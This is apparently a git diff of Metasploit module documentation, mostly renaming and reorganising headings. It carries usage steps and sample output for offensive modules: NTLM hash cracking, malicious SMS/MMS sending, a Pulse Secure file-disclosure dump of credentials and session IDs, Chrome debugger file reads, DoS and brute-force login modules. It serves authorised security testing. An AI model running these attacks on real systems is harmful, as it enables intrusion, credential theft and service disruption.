-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Windows
-  based password hashes, such as:
-
-  * `LM`, or `LANMAN` based passwords
-  * `NT`, `NTLM`, or `NTLANMAN` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with an `nt` or `lm` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_windows_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:lm_password ntlm:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C jtr:lm
-creds add user:nt_password ntlm:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C jtr:nt
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_windows_fast 
-msf5 auxiliary(analyze/jtr_windows_fast) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-koittz
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1v82lkm
-[*] Cracking lm hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-Using default target encoding: CP850
-Warning: poor OpenMP scalability for this hash type, consider --fork=8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 1177Kp/s 1177Kc/s 1177KC/s PLANO..VAGRANT
-Session completed
-[*] Cracking lm hashes in single mode...
-Using default input encoding: UTF-8
-Using default target encoding: CP850
-Warning: poor OpenMP scalability for this hash type, consider --fork=8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:02 DONE (2019-02-11 19:34) 0g/s 4634Kp/s 4634Kc/s 4634KC/s WAC1907..E1900
-Session completed
-[*] Cracking lm hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-Using default target encoding: CP850
-Warning: poor OpenMP scalability for this hash type, consider --fork=8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 41152Kp/s 41152Kc/s 41152KC/s 0766269..0769743
-Session completed
-[*] Cracked Passwords this run:
-[+] lm_password:password
-[*] Cracking nt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking nt hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking nt hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] lm_password:password
-[+] nt_password:password
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_windows_fast) > creds
-Credentials
-===========
-
-host  origin  service  public       private                                                            realm  private_type  JtR Format
-----  ------  -------  ------       -------                                                            -----  ------------  ----------
-                       lm_password  password                                                                  Password      
-                       lm_password  e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
-                       nt_password  password                                                                  Password      
-                       nt_password  aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
-
-```

documentation/modules/auxiliary/client/iec104/iec104.md

@@ -52,7 +52,7 @@ msf auxiliary(client/iec104/iec104) > set rhost 127.0.0.1
 rhost => 127.0.0.1
 msf auxiliary(client/iec104/iec104) > run
 
-[+] 127.0.0.1:2404 - Recieved STARTDT_ACT
+[+] 127.0.0.1:2404 - Received STARTDT_ACT
 [*] 127.0.0.1:2404 - Sending 104 command
 [+] 127.0.0.1:2404 -   Parsing response: Interrogation command (C_IC_NA_1)
 [+] 127.0.0.1:2404 -     TX: 0002 RX: 0000
@@ -77,7 +77,7 @@ msf auxiliary(client/iec104/iec104) > run
 [+] 127.0.0.1:2404 -     CauseTx: 0a (Termination Activation)
 [*] 127.0.0.1:2404 - operation ended
 [*] 127.0.0.1:2404 - Terminating Connection
-[+] 127.0.0.1:2404 - Recieved STOPDT_ACT
+[+] 127.0.0.1:2404 - Received STOPDT_ACT
 [*] Auxiliary module execution completed
 msf auxiliary(client/iec104/iec104) >
 ```
@@ -97,7 +97,7 @@ msf auxiliary(client/iec104/iec104) > set command_value 5
 command_value => 5
 msf auxiliary(client/iec104/iec104) > run
 
-[+] 127.0.0.1:2404 - Recieved STARTDT_ACT
+[+] 127.0.0.1:2404 - Received STARTDT_ACT
 [*] 127.0.0.1:2404 - Sending 104 command
 [+] 127.0.0.1:2404 -   Parsing response: Double command (C_DC_NA_1)
 [+] 127.0.0.1:2404 -     TX: 0002 RX: 0000
@@ -114,7 +114,7 @@ msf auxiliary(client/iec104/iec104) > run
 [+] 127.0.0.1:2404 -     IOA: 5 DCO: 0x05
 [*] 127.0.0.1:2404 - operation ended
 [*] 127.0.0.1:2404 - Terminating Connection
-[+] 127.0.0.1:2404 - Recieved STOPDT_ACT
+[+] 127.0.0.1:2404 - Received STOPDT_ACT
 [*] Auxiliary module execution completed
 msf auxiliary(client/iec104/iec104) >
 ```

documentation/modules/auxiliary/client/mms/send_mms.md

@@ -1,10 +1,12 @@
+## Vulnerable Application
+
 The ```auxiliary/client/mms/send_mms``` module allows you to send a malicious attachment to a
 collection of phone numbers of the same carrier.
 
 In order to use this module, you must set up your own SMTP server to deliver messages. Popular
 mail services such as Gmail, Yahoo, Live should work fine.
 
-## Module Options
+## Options
 
 **CELLNUMBERS**
 
@@ -74,7 +76,7 @@ in order to receive the text, such as AT&T.
 
 The MMS subject. Some carriers require this in order to receive the text, such as AT&T.
 
-## Supported Carrier Gateways
+### Supported Carrier Gateways
 
 The module supports the following carriers:
 
@@ -84,14 +86,14 @@ The module supports the following carriers:
 * Verizon
 * Google Fi
 
-## Finding the Carrier for a Phone Number
+### Finding the Carrier for a Phone Number
 
 Since you need to manually choose the carrier gateway for the phone numbers, you need to figure out
 how to identify the carrier of a phone number. There are many services that can do this, such as:
 
 http://freecarrierlookup.com/
 
-## Gmail SMTP Example
+### Gmail SMTP Example
 
 Gmail is a popular mail server, so we will use this as a demonstration.
 
@@ -111,7 +113,7 @@ After creating the application password, configure auxiliary/client/mms/send_mms
 
 And you should be ready to go.
 
-## Yahoo SMTP Example
+### Yahoo SMTP Example
 
 Yahoo is also a fairly popular mail server (although much slower to deliver comparing to Gmail),
 so we will demonstrate as well.
@@ -136,7 +138,7 @@ After configuring your Yahoo account, configure auxiliary/client/mms/send_mms th
 
 And you're good to go.
 
-## Demonstration
+## Scenarios
 
 After setting up your mail server and the module, your output should look similar to this:
 

documentation/modules/auxiliary/client/sms/send_text.md

@@ -1,10 +1,12 @@
+## Vulnerable Application
+
 The ```auxiliary/client/sms/send_text``` module allows you to send a malicious text/link to a collection
 of phone numbers of the same carrier.
 
 In order to use this module, you must set up your own SMTP server to deliver messages. Popular
 mail services such as Gmail, Yahoo, Live should work fine.
 
-## Module Options
+## Options
 
 **CELLNUMBERS**
 
@@ -57,7 +59,7 @@ The password you use to log into the SMTP server.
 
 The FROM field of SMTP. In some cases, it may be used as ```SMTPUSER```.
 
-## Supported Carrier Gateways
+### Supported Carrier Gateways
 
 The module supports the following carriers:
 
@@ -73,7 +75,7 @@ The module supports the following carriers:
 **Note:** During development, we could not find a valid gateway for Sprint, therefore it is currently
 not supported.
 
-## Finding the Carrier for a Phone Number
+### Finding the Carrier for a Phone Number
 
 Since you need to manually choose the carrier gateway for the phone numbers, you need to figure out
 how to identify the carrier of a phone number. There are many services that can do this, such as:
@@ -82,7 +84,7 @@ http://freecarrierlookup.com/
 
 **Note:** If the phone is using Google Fi, then it may appear as a different carrier.
 
-## Gmail SMTP Example
+### Gmail SMTP Example
 
 Gmail is a popular mail server, so we will use this as a demonstration.
 
@@ -100,7 +102,7 @@ After creating the application password, configure auxiliary/client/sms/send_tex
 
 And you should be ready to go.
 
-## Yahoo SMTP Example
+### Yahoo SMTP Example
 
 Yahoo is also a fairly popular mail server (although much slower to deliver comparing to Gmail),
 so we will demonstrate as well.
@@ -123,7 +125,7 @@ After configuring your Yahoo account, configure auxiliary/client/sms/send_text t
 
 And you're good to go.
 
-## Demonstration
+### Scenarios
 
 After setting up your mail server and the module, your output should look similar to this:
 

documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md

@@ -3,7 +3,7 @@ This module triggers a Denial of Service vulnerability in the Flexense Enterpris
 a write access memory vialation via rapidly sending HTTP requests with large HTTP header values.  
 
 
-## Vulnerable Application 
+## Verification Steps
 According To publicly exploit Disclosure of Flexense HTTP Server v10.6.24
 Following list of softwares are vulnerable to Denial Of Service.
 read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065

documentation/modules/auxiliary/dos/http/ibm_lotus_notes.md

@@ -15,7 +15,7 @@ Vulnerable app versions include:
 
 Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999385
 
-## Verification
+## Verification Steps
 
 1. Start msfconsole
 1. `use auxiliary/dos/http/ibm_lotus_notes.rb`

documentation/modules/auxiliary/dos/http/ibm_lotus_notes2.md

@@ -15,7 +15,7 @@ IBM Notes 8.5 release
 
 Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999384 
 
-## Verification
+## Verification Steps
 
 Start msfconsole
 

documentation/modules/auxiliary/dos/http/metasploit_httphandler_dos.md

@@ -0,0 +1,36 @@
+## Vulnerable Application
+
+ Metasploit Framework before version 5.0.28
+
+## Verification Steps
+
+  1. Install Metasploit 5.0.27 or earlier (or checkout before commit 5621d200ccf62e4a8f0dad80c1c74f4e0e52d86b)
+  2. Start msfconsole with the target Metasploit instance and start any reverse_http/reverse_https listener
+  3. Start this module and set RHOSTS and RPORT to the target listener address and port.
+  4. Run the modulest <rhost>```
+  7. `msfconsole` should use 99%+ CPU for a varying amount of time depending on the DOSTYPE option. You may need to kill the process manually.
+
+## Options
+
+ **DOSTYPE**
+
+	GENTLE: *Current sessions will continue to work, but not future ones*
+	  A lack of input sanitation permits an attacker to submit a request that will be added to the resources and will be used as regex rule it is possible then to make a valid regex rule that captures all the new handler requests. The sessions that were established previously will continue to work.
+
+	SOFT: *No past or future sessions will work*
+      A lack of input sanitation and lack of exception handling causes Metasploit to behave abnormally when looking an appropriate resource for the request, by submitting an invalid regex as a resource. This means that no request, current or future will get served an answer.
+
+	HARD: *ReDOS or Catastrophic Regex Backtracking*
+	  A lack of input sanitization on paths added as resources allows an attacker to execute a catastrophic regex backtracking operation causing a Denial of Service by CPU consumption.
+
+## Scenarios
+
+```
+msf5 auxiliary(dos/http/metasploit_httphandler_dos) > run
+[*] Running module against 127.0.0.1
+
+[*] 127.0.0.1:8080 - Sending DoS packet...
+^C[-] Stopping running againest current target...
+[*] Control-C again to force quit all targets.
+[*] Auxiliary module execution completed
+```

documentation/modules/auxiliary/dos/http/webkitplus.md

@@ -55,7 +55,7 @@ at ../src/ephy-main.c line 432
 
 ```
 
-## Verification
+## Verification Steps
 
     Start msfconsole
     use auxiliary/dos/http/webkitplus

documentation/modules/auxiliary/gather/advantech_webaccess_creds.md

@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application
 
 This module exploits three vulnerabilities in Advantech WebAccess.
 
@@ -12,9 +12,6 @@ The final vulnerability exploited is that the HTML Form on the user edit page co
 plain text password in the masked password input box. Typically the system should replace the
 actual password with a masked character such as "*".
 
-
-## Vulnerable Application
-
 Version 8.1 was tested during development:
 
 http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccessUSANode8.1_20151230.exe
@@ -41,7 +38,6 @@ The username to use to log into Advantech WebAccess. By default, there is a buil
 The password to use to log into AdvanTech WebAccess. By default, the built-in account ```admin```
 does not have a password, which could be something you can use.
 
-
-## Demo
+## Scenarios
 
 ![webaccess_steal_creds](https://cloud.githubusercontent.com/assets/1170914/22353246/34b2045e-e3e5-11e6-992c-f3ab9dcbe716.gif)

documentation/modules/auxiliary/gather/browser_getprivateip.md

@@ -4,7 +4,7 @@ This module retrieves a browser's network interface IP addresses using WebRTC. H
 
 Related links : https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html
 
-## Verification
+## Verification Steps
 
     Start msfconsole
     use auxiliary/gather/browser_lanipleak

documentation/modules/auxiliary/gather/censys_search.md

@@ -1,4 +1,7 @@
-The module use the Censys REST API to access the same data accessible through web interface. The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.
+## Vulnerable Application
+
+The module use the Censys REST API to access the same data accessible through web interface.
+The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.
 
 ## Verification Steps
 
@@ -207,8 +210,3 @@ msf auxiliary(censys_search) > run
 [+] wesecure.nl - [997423]
 [*] Auxiliary module execution completed
 ```
-
-
-## References
-
-1. https://censys.io/api

documentation/modules/auxiliary/gather/chrome_debugger.md

@@ -0,0 +1,46 @@
+# Chrome Debugger Arbitary File Read / Abitrary Web Request Auxiliary Module
+
+This module takes advantage of misconfigured headless chrome sessions and either retrieves a specified file off the remote file system, or makes a web request from the remote machine.
+
+## Headless Chrome Sessions
+	
+A vulnerable Headless Chrome session can be started with the following command:
+
+```
+$ google-chrome --remote-debugging-port=9222 --headless --remote-debugging-address=0.0.0.0
+```
+
+This will start a webserver running on port 9222 for all network interfaces.
+
+## Verification Steps
+	
+1. Start `msfconsole`
+2. Execute `auxiliary/gather/chrome_debugger`
+3. Execute `set RHOST $REMOTE_ADDRESS`
+4. Execute `set RPORT 9222`
+5. Execute either `set FILEPATH $FILE_PATH_ON_REMOTE` or `set URL $URL_FROM_REMOTE`
+6. Execute `run`
+
+## Options
+
+* FILEPATH - The file path on the remote you wish to retrieve
+* URL - A URL you wish to fetch the contents of from the remote machine
+
+**Note:** One or the other must be set!
+
+## Example Run
+
+```
+[*] Attempting Connection to ws://192.168.20.168:9222/devtools/page/CF551031373306B35F961C6C0968DAEC
+[*] Opened connection
+[*] Attempting to load url file:///etc/passwd
+[*] Received Data
+[*] Sending request for data
+[*] Received Data
+[+] Retrieved resource
+[*] Auxiliary module execution completed
+```
+
+## Notes
+
+This can be useful for retrieving cloud metadata in certain scenarios.  Primarily this module targets developers.

documentation/modules/auxiliary/gather/kerberos_enumusers.md

@@ -9,7 +9,7 @@ accounts are enabled or disabled/locked out.
 To use kerberos_enumusers, make sure you are able to connect to the
 Kerberos service on a Domain Controller.
 
-## Scenario
+## Scenarios
 
 The following demonstrates basic usage, using a custom wordlist,
 targeting a single Domain Controller to identify valid domain user

documentation/modules/auxiliary/gather/nis_bootparamd_domain.md

@@ -1,4 +1,4 @@
-## Intro
+## Introduction
 
 From the `bootparamd(8)` man page:
 

documentation/modules/auxiliary/gather/nis_ypserv_map.md

@@ -1,4 +1,4 @@
-## Intro
+## Introduction
 
 If you've worked with old Unix systems before, you've probably
 encountered NIS (Network Information Service). The most familiar way of

documentation/modules/auxiliary/gather/nuuo_cms_bruteforce.md

@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application
 
 Nuuo CMS Session Bruteforce
 
@@ -49,8 +49,6 @@ Secondly, due to the nature of this application, it is normal to have the softwa
 
 It is worth noticing that when a user logs in, the session has to be maintained by periodically sending a PING request. To bruteforce the session, we send each guess with a PING request until a 200 OK message is received. 
 
-## Vulnerable Application
-
 [NUUO Central Management Server (CMS): all versions below 2.4.0](d1.nuuo.com/NUUO/CMS/)
 
  - 1.5.2 OK
@@ -73,9 +71,3 @@ msf5 auxiliary(gather/nuuo_cms_bruteforce) > exploit
 [*] Auxiliary module execution completed
 msf5 auxiliary(gather/nuuo_cms_bruteforce) >
 ```
-
-## References
-
-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
-
-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt

documentation/modules/auxiliary/gather/nuuo_cms_file_download.md

@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application
 
 Nuuo CMS Authenticated Arbitrary File Download
 
@@ -26,8 +26,6 @@ This module works in the following way:
 
 Due to the lack of ZIP encryption support in Metasploit, the module prints a warning indicating that the archive cannot be unzipped in Msf.
 
-## Vulnerable Application
-
 [NUUO Central Management Server (CMS): all versions up to and including 3.5.0](http://d1.nuuo.com/NUUO/CMS/)
 
 The following versions were tested:
@@ -63,9 +61,3 @@ msf5 auxiliary(gather/nuuo_cms_file_download) > exploit
 [*] Auxiliary module execution completed
 msf5 auxiliary(gather/nuuo_cms_file_download) >
 ```
-
-## References
-
-- https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
-
-- https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt

documentation/modules/auxiliary/gather/office365userenum.md

@@ -1,3 +1,5 @@
+## Vulnerable Application
+
 External python module compatible with v2 and v3.
 
 Enumerate valid usernames (email addresses) from Office 365 using ActiveSync.
@@ -14,9 +16,7 @@ Microsoft Security Response Center stated on 2017-06-28 that this issue does not
 
 This script is maintaing the ability to run independently of MSF.
 
-## Vulnerable Application
-
-  Office365's implementation of ActiveSync
+Office365's implementation of ActiveSync is vulnerable.
 
 ## Verification Steps
 
@@ -41,6 +41,7 @@ This script is maintaing the ability to run independently of MSF.
 
 
 ## Scenarios
+
 The following demonstrates basic usage, using the supplied users wordlist
 and default options.
 
@@ -72,6 +73,3 @@ grimhacker.com  ..        |
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 ```
-
-## References
-https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/

documentation/modules/auxiliary/gather/pulse_secure_file_disclosure.md

@@ -0,0 +1,101 @@
+## Introduction
+
+This module exploits a pre-auth directory traversal in the Pulse Secure
+VPN server to dump an arbitrary file. Dumped files are stored in loot.
+
+If the `Automatic` action is set, plaintext and hashed credentials, as
+well as session IDs, will be dumped. Valid sessions can be hijacked by
+setting the `DSIG` browser cookie to a valid session ID.
+
+For the `Manual` action, please specify a file to dump via the `FILE`
+option. `/etc/passwd` will be dumped by default. If the `PRINT` option is
+set, file contents will be printed to the screen, with any unprintable
+characters replaced by a period.
+
+Please see related module exploit/linux/http/pulse_secure_cmd_exec for
+a post-auth exploit that can leverage the results from this module.
+
+## Actions
+
+```
+Name       Description
+----       -----------
+Automatic  Dump creds and sessions
+Manual     Dump an arbitrary file (FILE option)
+```
+
+## Options
+
+**FILE**
+
+Set this to the file you want to dump. The default is `/etc/passwd`.
+Valid only in manual mode.
+
+**PRINT**
+
+Whether to print file contents to the screen. Valid only in manual mode.
+
+## Usage
+
+Dumping creds and sessions in automatic mode:
+
+```
+msf5 auxiliary(gather/pulse_secure_file_disclosure) > run
+[*] Running module against [redacted]
+
+[*] Running in automatic mode
+[*] Dumping /data/runtime/mtmp/lmdb/dataa/data.mdb
+[+] /Users/wvu/.msf4/loot/20191029221840_default_[redacted]_PulseSecureVPN_273470.mdb
+[*] Dumping /data/runtime/mtmp/lmdb/randomVal/data.mdb
+[*] Parsing session IDs...
+[+] Session ID found: df502e6052d9002d8f02160af8bfd055
+[+] Session ID found: 249b470bd9bd1983f721ca950a74e61c
+[+] Session ID found: acbef5625
+[+] Session ID found: c145e683a
+[+] Session ID found: fc6c097dd
+[+] Session ID found: 249b470bd9bd1983f721ca950a74e61c
+[+] Session ID found: c145e683a17cfacb72a47eb8b2515c14
+[+] Session ID found: a7661751393e16fa253e97bd02dc2a4f
+[+] Session ID found: 7e78ab276afea3f00dfa41892c437156c699eff8
+[+] /Users/wvu/.msf4/loot/20191029221845_default_[redacted]_PulseSecureVPN_607925.mdb
+[*] Dumping /data/runtime/mtmp/system
+[+] /Users/wvu/.msf4/loot/20191029221851_default_[redacted]_PulseSecureVPN_530345.bin
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/pulse_secure_file_disclosure) > loot
+
+Loot
+====
+
+host         service  type                                        name                                        content                   info                   path
+----         -------  ----                                        ----                                        -------                   ----                   ----
+[redacted]            Pulse Secure VPN Arbitrary File Disclosure  /data/runtime/mtmp/lmdb/dataa/data.mdb      application/octet-stream  Plaintext credentials  /Users/wvu/.msf4/loot/20191029221840_default_[redacted]_PulseSecureVPN_273470.mdb
+[redacted]            Pulse Secure VPN Arbitrary File Disclosure  /data/runtime/mtmp/lmdb/randomVal/data.mdb  application/octet-stream  Session IDs            /Users/wvu/.msf4/loot/20191029221845_default_[redacted]_PulseSecureVPN_607925.mdb
+[redacted]            Pulse Secure VPN Arbitrary File Disclosure  /data/runtime/mtmp/system                   application/octet-stream  Hashed credentials     /Users/wvu/.msf4/loot/20191029221851_default_[redacted]_PulseSecureVPN_530345.bin
+
+msf5 auxiliary(gather/pulse_secure_file_disclosure) >
+```
+
+Dumping default `/etc/passwd` in manual mode:
+
+```
+msf5 auxiliary(gather/pulse_secure_file_disclosure) > set action Manual
+action => Manual
+msf5 auxiliary(gather/pulse_secure_file_disclosure) > run
+[*] Running module against [redacted]
+
+[*] Running in manual mode
+[*] Dumping /etc/passwd
+root:x:0:0:root:/:/bin/bash
+nfast:x:0:0:nfast:/:/bin/bash
+bin:x:1:1:bin:/:
+nobody:x:99:99:Nobody:/:
+dns:x:98:98:DNS:/:
+term:x:97:97:Telnet/SSH:/:
+web80:x:96:96:Port 80 web:/:
+rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
+postgres:x:102:102:PostgreSQL User:/:
+
+[+] /Users/wvu/.msf4/loot/20191029222949_default_[redacted]_PulseSecureVPN_073170.bin
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/pulse_secure_file_disclosure) >
+```

documentation/modules/auxiliary/gather/qnap_backtrace_admin_hash.md

@@ -1,4 +1,4 @@
-## Intro
+## Introduction
 
 This is going to be a quick rundown of how to use this module to
 retrieve the admin hash from a vulnerable QNAP device.

documentation/modules/auxiliary/gather/samsung_browser_sop_bypass.md

@@ -1,10 +1,11 @@
-## Description
-This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser (CVE-2017-17692), a popular mobile browser shipping with Samsung Android devices. By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up and the gather credentials is stored in `creds`
-
 ## Vulnerable Application
+
 This Module was tested on Samsung Internet Browser 5.4.02.3 during development.
 
+This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser (CVE-2017-17692), a popular mobile browser shipping with Samsung Android devices. By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up and the gather credentials is stored in `creds`
+
 ## Verification Steps
+
 1. Start `msfconsole -q`
 2. `use auxiliary/gather/samsung_browser_sop_bypass`
 3. `set SRVHOST`
@@ -14,6 +15,7 @@ This Module was tested on Samsung Internet Browser 5.4.02.3 during development.
 5. `run`
 
 ## Scenarios
+
 ```
 $ sudo msfconsole -q
 msf > use auxiliary/gather/samsung_browser_sop_bypass
@@ -49,8 +51,6 @@ host            origin          service          public          private
 msf auxiliary(samsung_browser_sop_bypass) >
 ```
 
-## Demos
-
 Working of MSF Module: `https://youtu.be/ulU98cWVhoI`
 
 Vulnerable Browser: `https://youtu.be/lpkbogxJXnw`

documentation/modules/auxiliary/scanner/acpp/login.md

@@ -0,0 +1,28 @@
+## Vulnerable Application
+
+ACPP is an undocumented and proprietary Apple protocol found in Airport products which protects the credentials used to administer the device. This module attempts exploit a weak encryption mechanism (fixed XOR key) by brute forcing the password via a dictionary attack or specific password.
+
+More information can be found on the [Rapid7 Vulnerability & Exploit Database page](https://www.rapid7.com/db/modules/auxiliary/scanner/acpp/login)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use auxiliary/scanner/acpp/login`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+### Apple AirPort Extreme 802.11g
+
+  ```
+  msf > use auxiliary/scanner/acpp/login
+  msf auxiliary(scanner/acpp/login) > show options
+  msf auxiliary(scanner/acpp/login) > set RHOSTS 1.1.1.1
+      RHOSTS => 1.1.1.1
+  msf auxiliary(scanner/acpp/login) > set PASSWORD myPassword
+      PASSWORD => myPassword
+  msf auxiliary(scanner/acpp/login) > run
+    [*] 1.1.1.1:5009 - 1.1.1.1:5009 - Starting ACPP login sweep
+    [*] 1.1.1.1:5009 - 1.1.1.1:5009 - ACPP Login Successful: myPassword
+  ```

documentation/modules/auxiliary/scanner/afp/afp_login.md

@@ -0,0 +1,45 @@
+## Vulnerable Application
+
+Apple Filing Protocol (AFP) is Apple's file sharing protocol similar to SMB, and NFS. This module attempts to brute force authentication credentials for AFP.
+
+References:
+
+* [AFP_Reference](https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html)
+* [AFP_Security](https://developer.apple.com/library/mac/documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html)
+
+### Kali 2019.3 Install Instructions
+
+1. `sudo apt-get install netatalk`
+2. edit `/etc/default/netatalk` and add the following lines:
+
+    ```
+    ATALKD_RUN=no
+    PAPD_RUN=no
+    CNID_METAD_RUN=yes
+    AFPD_RUN=yes
+    TIMELORD_RUN=no
+    A2BOOT_RUN=no
+    ```
+
+3. Restart the service: `sudo /etc/init.d/netatalk restart`
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/afp/afp_login`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+### A run on Kali Linux 2019.3 and Netatalk 3.1.12
+
+  ```
+  msf > use modules/auxiliary/scanner/afp/afp_login
+  msf auxiliary(scanner/afp/afp_login) > set USERNAME tuser
+  msf auxiliary(scanner/afp/afp_login) > set PASSWORD myPassword
+  msf auxiliary(scanner/afp/afp_login) > set RHOST 172.17.0.2
+  msf auxiliary(scanner/afp/afp_login) > run
+    [*] 172.17.0.2:548 - Scanning IP: 172.17.0.2
+    [*] 172.17.0.2:548 - Login Successful: tuser:myPassword
+  ```

documentation/modules/auxiliary/scanner/afp/afp_server_info.md

@@ -3,10 +3,11 @@
 Apple Filing Protocol (AFP) is Apple's file sharing protocol similar to SMB, and NFS.  This module will gather information about the service.
 Netatalk is a Linux implementation of AFP.
 
-The following was done on Ubuntu 16.04, and is largely base on [missingreadme.wordpress.com](https://missingreadme.wordpress.com/2010/05/08/how-to-set-up-afp-filesharing-on-ubuntu/):
-  
+The following was done on Ubuntu 16.04, and is largely based on [missingreadme.wordpress.com](https://missingreadme.wordpress.com/2010/05/08/how-to-set-up-afp-filesharing-on-ubuntu/):
+
   1. `sudo apt-get install netatalk`
   2. edit `/etc/default/netatalk` and add the following lines:
+
     ```
     ATALKD_RUN=no
     PAPD_RUN=no
@@ -15,6 +16,7 @@ The following was done on Ubuntu 16.04, and is largely base on [missingreadme.wo
     TIMELORD_RUN=no
     A2BOOT_RUN=no
     ```
+
   3. Restart the service: `sudo /etc/init.d/netatalk restart`
 
 ## Verification Steps
@@ -22,40 +24,41 @@ The following was done on Ubuntu 16.04, and is largely base on [missingreadme.wo
   1. Install and configure afp (or netatalk in a Linux environment)
   2. Start msfconsole
   3. Do: `auxiliary/scanner/afp/afp_server_info`
-  4. Do: `run`
+  4. Do: `set RHOSTS [ip]`
+  5. Do: `run`
 
 ## Scenarios
 
-  A run against the configuration from these docs
+### Ubuntu 16.04 with Netatalk 2.2.5
 
   ```
-  msf5 auxiliary(scanner/acpp/login) > use auxiliary/scanner/afp/afp_server_info 
+  msf5 auxiliary(scanner/acpp/login) > use auxiliary/scanner/afp/afp_server_info
   msf5 auxiliary(scanner/afp/afp_server_info) > set rhosts 1.1.1.1
   rhosts => 1.1.1.1
   msf5 auxiliary(scanner/afp/afp_server_info) > run
-  
+
